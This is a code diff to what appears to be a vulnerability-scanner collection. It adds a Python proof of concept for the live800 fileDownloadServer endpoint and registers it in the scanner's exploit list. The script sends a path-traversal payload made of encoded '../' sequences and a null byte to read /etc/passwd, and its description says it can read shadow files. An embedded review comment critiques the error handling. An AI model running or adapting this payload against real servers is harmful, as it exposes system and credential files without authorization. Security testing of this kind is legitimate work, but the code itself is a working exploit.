diff --git a/cms/cmsmain.py b/cms/cmsmain.py
index df54acc..3277a19 100755
--- a/cms/cmsmain.py
+++ b/cms/cmsmain.py
@@ -93,6 +93,7 @@ from cms.live800.live800_downlog_filedownload import live800_downlog_filedownloa
 from cms.live800.live800_loginAction_sqli import live800_loginAction_sqli_BaseVerify
 from cms.live800.live800_sta_export_sqli import live800_sta_export_sqli_BaseVerify
 from cms.live800.live800_services_xxe import live800_services_xxe_BaseVerify
+from cms.live800.live800_fileDownloadServer_fileread import live800_fileDownloadServer_fileread_BaseVerify
 
 #thinkphp vulns
 from cms.thinkphp.onethink_category_sqli import onethink_category_sqli_BaseVerify
diff --git a/cms/live800/live800_fileDownloadServer_fileread.py b/cms/live800/live800_fileDownloadServer_fileread.py
new file mode 100644
index 0000000..64a2a9c
--- /dev/null
+++ b/cms/live800/live800_fileDownloadServer_fileread.py
@@ -0,0 +1,35 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+'''
+name: live800 fileDownloadServer文件读取漏洞
+referer: unknown
+author: Lucifer
+description: 拼接导致的任意文件读取,root权限可读shadow。
+'''
+import sys
+import requests
+import warnings
+from termcolor import cprint
+
+class live800_fileDownloadServer_fileread_BaseVerify:
+    def __init__(self, url):
+        self.url = url
+
+    def run(self):
+        headers = {
+            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+        }
+        payload = "/live800/fileDownloadServer?companyID=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd%00&fid=3&fna=a&act=1"
+        vulnurl = self.url + payload
+        try:
+            req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
+            if r"root:" in req.text and r"/bin/bash" in req.text:
+                cprint("[+]存在live800 fileDownloadServer文件读取漏洞...(高危)\tpayload: "+vulnurl, "red")
+
+        except:
+            cprint("[-] "+__file__+"====>连接超时", "cyan")
+
+if __name__ == "__main__":
+    warnings.filterwarnings("ignore")
+    testVuln = live800_fileDownloadServer_fileread_BaseVerify(sys.argv[1])
+    testVuln.run()
diff --git a/pocdb.py b/pocdb.py
index e7c9e3e..5e92341 100755
--- a/pocdb.py
+++ b/pocdb.py
@@ -68,6 +68,7 @@ class pocdb_pocs:
         "live800在线客服系统loginAction SQL注入漏洞":live800_loginAction_sqli_BaseVerify(url),
         "live800在线客服系统多处SQL注入GETSHELL漏洞":live800_sta_export_sqli_BaseVerify(url),
         "live800在线客服系统XML实体注入漏洞":live800_services_xxe_BaseVerify(url),
+        "live800 fileDownloadServer文件读取漏洞":live800_fileDownloadServer_fileread_BaseVerify(url),
         "Onethink 参数category SQL注入":onethink_category_sqli_BaseVerify(url),
         "ThinkPHP 代码执行漏洞":thinkphp_code_exec_BaseVerify(url),
         "汇思学习管理系统任意文件下载":wizbank_download_filedownload_BaseVerify(url),
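Review bot: The bare `except:` in `run` of the new live800_fileDownloadServer_fileread.py catches every exception — `KeyboardInterrupt`, `SystemExit`, and the `TypeError` raised when `self.url` is not a string — and reports all of them as `连接超时`, so a bug in the scanner is indistinguishable from a host that genuinely timed out. Narrowing it to `except requests.exceptions.RequestException as e:` and appending `str(e)` to the cyan message keeps the best-effort behaviour while surfacing the real cause. Related: `verify=False` is set on the request inside the class, but `warnings.filterwarnings("ignore")` lives only in the `__main__` block, so when the check is instantiated from pocdb.py each run emits an InsecureRequestWarning; either move the filter next to the request or document that the caller is expected to suppress it. The match condition also accepts any body containing `root:` and `/bin/bash` regardless of status code, which is worth a comment such as `# NOTE: no status-code check; a 200/404 page echoing these strings counts as a hit`.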
@@ -277,7 +278,6 @@ class pocdb_pocs:
         "正方教务系统services.asmx SQL注入":zfsoft_service_stryhm_sqli_BaseVerify(url),
         "正方教务系统数据库任意操纵":zfsoft_database_control_BaseVerify(url),
         "正方教务系统default3.aspx爆破页面":zfsoft_default3_bruteforce_BaseVerify(url),
-        "V2视频会议系统某处SQL注射、XXE漏洞(可getshell)":v2Conference_sqli_xxe_BaseVerify(url),
         "1039驾校通未授权访问漏洞":jxt1039_unauth_BaseVerify(url),
         "thinksns category模块代码执行":thinksns_category_code_exec_BaseVerify(url),
         "TPshop eval-stdin.php 代码执行漏洞":tpshop_eval_stdin_code_exec_BaseVerify(url),